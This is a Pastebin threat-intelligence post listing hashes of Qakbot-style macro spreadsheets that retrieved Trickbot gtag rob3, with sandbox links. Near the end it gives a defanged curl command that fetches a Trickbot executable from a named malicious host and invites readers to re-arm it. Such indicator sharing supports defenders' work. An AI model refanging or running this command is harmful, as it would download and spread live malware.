malware_traffic

2020-11-11 (Wed) - Qakbot-style spreadsheets with macros that retrieved Trickbot gtag rob3

Nov 11th, 2020 (edited)
1,541
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 2020-11-11 (WED) - QAKBOT-STYLE SPREADSHEETS WITH MACROS THAT RETRIEVED TRICKBOT GTAG ROB3
  2.  
  3. - 25b5643ebf2b00aacc88e19661d3915292c8983fdab8285175e13d8361056049 1_1011998499_11102020.xlsb
  4. - 32ad29562b57f4a858f5a0c79cbece7fbf81e4be815683a59943ae2eeaff110e 1_468135799_11102020.xlsb
  5. - 428832a6e6615a5b78f41ca2f90e782045e255f862c8c440062a0a72b3a8066b 1_1712758087_11102020.xlsb
  6. - 5696a4baae57dc899e6ac080bc726eaa139145dda19aa4c1ef148af6a0b96029 1_1607027682_11102020.xlsb
  7. - 67d02f2c249e8cd5aec67011741c8b032c6183e5039d504114e5ca5467e1c676 1_1646832256_11102020.xlsb
  8. - a309de46c45dcd82aa88bc99879ddf2aac191c1b85cb4094d37e58a2497fbe27 1_766416357_11102020.xlsb
  9. - bcc5d1d20d8713ea6d234dc1d55655bc92de83aeda6dc7bc1f1b4175d3d5319a 1_867342178_11102020.xlsb
  10. - c4dc4cce2725af46f08a80d9606fdb57a6309d2af965a686f026285554c5d8ba 1_1900530932_11102020.xlsb
  11. - ede77e7ae3bfe914b166bca8472fb4b3bfb8f3f6fecb9ec71af176db0c82394f 1_359571260_11102020.xlsb
  12. - ee2aa25e17e1dc6c6fa86f16e6d7275304dc4309acfffe1d7efc2953cda4e5ee 1_1975618945_11102020.xlsb
  13. - f03c558a0f6b15ca48abaa95c0a5db24d5b2bd3cd6448bd1a8147a1288343d23 1_2143892845_11102020.xlsb
  14.  
  15. NOTES:
  16.  
  17. - Example XLSB at: https://app.any.run/tasks/b4bad049-effe-46df-bf1a-7d2384f9f34c
  18. - Follow-up EXE at: https://app.any.run/tasks/0c133828-8185-473f-a14a-47183ad94687
  19.  
  20. You can grab one of the Trickbot EXE files with the following cURL command (defanged, so you'll have to "fang" it):
  21.  
  22. curl -A "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)" -o Trickbot-gtag-rob3.exe hxxps:/www.korporatellc[.]com/aacclksiw2%20iesod%20eqi.jpg
  23.  
  24.  
RAW Paste Data